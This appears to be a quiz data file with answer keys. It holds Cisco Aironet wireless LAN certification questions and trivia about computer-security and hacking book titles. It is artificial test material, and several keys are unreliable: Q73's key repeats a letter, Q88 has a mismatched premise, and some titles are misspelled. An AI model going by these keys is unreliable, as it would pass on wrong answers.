B#Wlan4SE Q 48. The antennas that Cisco sells for the Aironet product line are polarized in what fashion?	^A. spatial	^B. vertical	^C. horizontal	^D. antenna dependent
A,B#Wlan4SE Q 49. The in-line power injector that is supplied with the 350 series Access Point can power which two devices? (Choose two.)	^A. Cisco Aironet 350 series bridge	^B. Cisco Aironet 350 series Access Point	^C. Cisco Aironet 340 series Access Point	^D. Cisco Aironet 350 Workgroup Bridge (WGB)
A#Wlan4SE Q 50. Wireless LAN uses	^A. collision avoidance	^B. collision recovery	^C. collision detection
B#Wlan4SE Q 51. The 2.4 GHz 6 dBi patch antenna has what vertical beamwidth?	^A. 21.5 degrees	^B. 65 degrees	^C. 85 degrees	^D. 170 degrees
C,D#Wlan4SE Q 52. Which two can power the Cisco Aironet 350 series Access Points? (Choose two.)	^A. Cisco 1751 router	^B. Cisco 2924-XL switch	^C. Cisco 3524-PWR-XL switch	^D. Cisco Cat6K switch with WS-X6348 blade
C#Wlan4SE Q 53. Network managers are using WLANs due to the need for:	^A. security	^B. performance	^C. flexibility	^D. cost savings
A,C#Wlan4SE Q 54. Which two Cisco Aironet antennas are directional antennas? (Choose two.)	^A. 6 dBi patch	^B. 2.14 dipole	^C. 13.5 dBi Yagi	^D. 5.2 dBi Diversity pillar mount
A,D#Wlan4SE Q 55. Which two devices from Cisco allow for the wireless connection of two wired LANs? (Choose two.)	^A. bridge	^B. Access Point	^C. wireless client	^D. Workgroup Bridge (WGB)
aironet Client Utility#Wlan4SE Q 56. All Cisco wireless client adapters include the Cisco ACU. What does the ACU stand for?
A#Wlan4SE Q 57. Which Cisco antenna has the narrowest angle of radiation?	^A. 21 dBi dish	^B. 6 dBi patch	^C. 13.5 dBi Yagi	^D. 8.5 dBi patch
A,B#Wlan4SE Q 58. Which two devices allow wireless 802.11b clients the ability to communicate with a wired LAN? (Choose two.)	^A. bridge	^B. Access Point	^C. 802.11b PCMCIA card	^D. Workgroup Bridge (WGB)
A#Wlan4SE Q 59. Hopping code is found in.	^A. FHSS	^B. DSSS	^C. CDDS	^D. CSMA/CD
A#Wlan4SE Q 60. The anomaly that occurs when RF signals bounce off of objects and are received out of phase at the receiver is often referred to as _____________.	^A. multipath	^B. a Fresnel zone	^C. signal absorption	^D. microwave interference
B#Wlan4SE Q 61. Which product radio type is considered by WECA to be WiFi compliant?	^A. 802.11 FHSS products	^B. 802.11b DSSS products	^C. 802.11b FHSS products	^D. 802.11 DSSS 1 and 2 Mbps products
D#Wlan4SE Q 62. Current FCC regulations require WLAN product manufacturers to use a maximum dwell time of ________ ms.	^A. 100	^B. 200	^C. 300	^D. 400
C#Wlan4SE Q 63. What occurs when a tree or other foliage is in the direct path between the transmitter and receiver of a 2.4 GHz signal?	^A. The signal is reflected.	^B. The signal is refracted.	^C. The signal is absorbed.	^D. The signal is diffracted.
C#Wlan4SE Q 64. What is the seal that is issued by WECA to show that a product has passed interoperability testing with other manufacturer's 802.11b products?	^A. HiFi	^B. WHY	^C. WiFi	^D. WECA
A#Wlan4SE Q 65. DSSS is a form of.	^A. spread spectrum radio	^B. user rate radio	^C. spreading ratio	^D. input parameter	^E. output parameter
B#Wlan4SE Q 66. Which specific antenna architecture is used to help eliminate RF null areas of coverage?	^A. splitters	^B. diversity	^C. high gain omni	^D. patch antennas
D#Wlan4SE Q 67. Which IEEE 802.11 task group is responsible for the development of WLAN security standards?	^A. 802.11d	^B. 802.11e	^C. 802.11f	^D. 802.11i
B#Wlan4SE Q 68. 802.11b operates using lower frequencies than 802.11a.	^A. False	^B. True	^C. This is not always true  must be judged case by case
A,B#Wlan4SE Q 69. Why is antenna diversity useful? (Choose two.)	^A. It alleviates null zones.	^B. It helps to overcome multi-path distortion.	^C. It allows the Access Point to cover two different cells.	^D. It adds more coverage area by using a directional antenna.
A#Wlan4SE Q 70. Because of some timing specifications in the 802.11 standard, what is the maximum distance that an Access Point can reliably connect to a client?	^A. approximately 1 mile or 1.6 km	^B. approximately 2 miles or 3.2 km	^C. 25+ miles or 40+ km	^D. no limit
B#Wlan4SE Q 71. A directional antenna focuses the RF signal more in one direction than others, thus decreasing the range more in that direction.	^A. True	^B. False	^C. This is not always true  must be judged case by case
D#Wlan4SE Q 72. How many channels in the 2.4 GHz band are available in an ETSI regulated country?	^A. 9	^B. 10	^C. 11	^D. 13	^E. 14
B,D,D#Wlan4SE Q 73. When doing a survey in a hospital application, which three should you consider? (Choose three.)	^A. pagers	^B. fire doors	^C. televisions	^D. microwave ovens	^E. radiology/X-ray areas
B#Wlan4SE Q 74. 802.11b access points generally offer greater range than 802.11a.	^A. This is not always true  must be judged case by case	^B. True	^C. False
A,B#Wlan4SE Q 75. What differentiates the FCC and ETSI regulations pertaining to 802.11b Wireless LANs? (Choose two.)	^A. power output of the radio	^B. number of defined channels	^C. number of clients allowed per Access Point	^D. type of antenna connector used on Access Points
B,C#Wlan4SE Q 76. What are two possible sources of interference for 802.1b devices in a home environment? (Choose two.)	^A. cellular phones	^B. cordless phones	^C. microwave ovens	^D. satellite dish receivers
B#Wlan4SE Q 77. Cisco Aironet 1200 Series support both 802.11a and 802.11g.	^A. True	^B. False	^C. This is not always true  must be judged case by case
B#Wlan4SE Q 78. What is the highest transmission speed achievable with an IEEE 802.11b compatible radio?	^A. 2 Mbps	^B. 11 Mbps	^C. 15 Mbps	^D. 22 Mbps	^E. 54 Mbps
C,F#Wlan4SE Q 79. Which 5 GHz bands in the United States are designated for outdoor use only? (Choose two.)	^A. UNII-1	^B. UNII-2	^C. UNII-3	^D. 5.15-5.25 GHz	^E. 5.25-5.35 GHz	^F. 5.725-5.825 GHz
C#Wlan4SE Q 80. When performing the RF site survey, for maximum throughput your goal will be ensure that access points are placed in a manner where the edge of the access point's propagation overlaps the propagation of the adjacent access point.	^A. False	^B. This is not always true  must be judged case by case	^C. True
D#Wlan4SE Q 81. An 802.11a radio utilizes what technique to transmit its signal?	^A. IR	^B. DSSS	^C. FHSS	^D. OFDM
A#Wlan4SE Q 82. How many channels are defined for use in the UNII.-1 band under 802.11a standards?	^A. 4	^B. 8	^C. 11	^D. 13
B#Wlan4SE Q 83. When performing the RF site survey, in general you should choose a location that enables the access point antenna to have minimum line-of-sight propagation with the clients.	^A. True	^B. False	^C. This is not always true  must be judged case by case
A,C,E,F#Wlan4SE Q 84. In the U.S., no licensing is required for which four RF bands? (Choose four.)	^A. 902-928 MHz	^B. 800-820 MHz	^C. 2.400-2.483 GHz	^D. 2.500-2.600 GHz	^E. 5.150-5.350 GHz	^F. 5.725-5.825 GHz
C#Wlan4SE Q 85. After June 1994, FCC and DOC regulations require all antenna connectiors to be proprietary (unique and non-standard). Cisco/Aironet has since used what connector on its Access Points and bridges?	^A. BNC	^B. RP-SMA	^C. RP-TNC	^D. N-connector
Wi-Fi #Wlan4SE Q 86. WECA was an organization promoting what wireless technology brand name?
A#Wlan4SE Q 87. The wireless medium of Cisco Aironet 350 Series Client Adapters is FHSS.	^A. False	^B. True	^C. This is not always true  must be judged case by case
D#Wlan4SE Q 88. What is the max transmission speed of 802.11b in 900 MHz band?	^A. 50	^B. 24	^C. 54	^D. 11
D#Wlan4SE Q 89. CSMA/CA is a	^A. feature no longer supported by Cisco	^B. media security protocol	^C. feature no longer supported by the latest WLAN standards	^D. media access protocol
milliwatt#Wlan4SE Q 90. The designator dBm is a decibel referenced to a(n) _____________.
A,C#Wlan4SE Q 117. When using WEP key hashing to enhance security, which two values are hashed together to create the per packet WEP key? (Choose two)	^A. WEP key	^B. CRC value	^C. Initialization Vector (IV)	^D. Nearest prime number to WEP key		
The Art of Exploitation	#Books Q1: Jon Erickson Hacking,Date: 01. Oktober 2003 ^  whats the subtitle:?  
The Shellcoder's Handbook	#Books Q2: Jack Koziol, David Litchfield, Dave Aitel Date: 01. march 2004 ^  Title?
Discovering and Exploiting Security Holes	#Books Q3: Jack Koziol, David Litchfield, Dave Aitel Date: 01. march 2004 ^  Whats the subtitle?
The Art of Intrusion	#Books Q4: Kevin Mitnick, William L. Simon  subtitle: The Real Stories Behind the Exploits of Hackers, Intruders & Deceivers ^  Title?
The Art of Deception	#Books Q5:Kevin D. Mitnick, William L. Simon, Steve Wozniak subtitle: Controlling the Human Element of Security, ^  Title?
Controlling the Human Element of Security	#Books Q6: Kevin D. Mitnick, William L. Simon, Steve Wozniak Title: The Art of Deception, ^  Whats the subtitle?
Secrets and Lies	#Books Q8: Bruce Schneier date jan. 2004 subtitle: Digital Security in a Networked World ^  Title?
The Fugitive Game	#Books Q9: Jonathan Littman jan. 1997  subtitle: Online with Kevin Mitnick ^  Title?
The Cuckoo's Egg	#Books Q10:Clifford Stoll okt 2000  subtitle: Tracking a Spy Through the Maze of Computer Espionage ^   Title?
The Masters of Deception	#Books Q11:Michele Slatalla 1996 subtitle:  The Gang That Ruled Cyberspace^   Title?
The Watchman	#Books Q12:Jonathan Littman 1997 subtitle: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen^  Title?
CYBERPUNK	#Books Q13:Katie Hafner 1995 subtitle: Outlaws and Hackers on the Computer Frontier, Revised ^   Title?
Security Warrior	#Books Q14: Cyrus Peikari, Anton Chuvakin 2004 subtitle: Know your Enemy. ^   Title?
Hacker Disassembling Uncovered	#Books Q15: Kris Kaspersky 2003 subtitle: Powerful techniques to safeguard your programming. ^   Title?
Hacking Exposed	#Books Q16: A series of books on computer forensics, W2k, W2k3, Linux, web applications and Network security. ^   Title?
Stealing the Network	#Books Q17:Ryan Russell, Ido Dubrawsky, FX, Joe Grand, Tim Mullen 2003 subtitle: How to Own the Box ^   Title?
Stealing the Network	#Books Q18:FX, Paul Craig, Joe Grand, Tim Mullen, Fyodor, Ryan Russell, Jay Beale  subtitle: How to Own a Continent ^    Title?
Zero Day Exploit	#Books Q19: Rob Shein aka Rogue Shoten, David Litchfield 2004  Subtitle:Countdown to darkness ^   Title?
Fugitive game		#Books Q20: The title of Jonathan Litmanns book concetrating on Kevin Mitnick
What is underground	#Books Q21: The title of the book written by the Australian Author Suelette Dreyfus in 1997
Secrets of a Super Hacker	#Books Q22: The title of the book written by Knightmare, Gareth Branwyn (Introduction) in 1994
The Cyberthief and the Samurai	#Books Q23: Jeff Goodell 1996 subtitle: The true story of Kevin Mitnick and the man who hunted him down. ^    Title?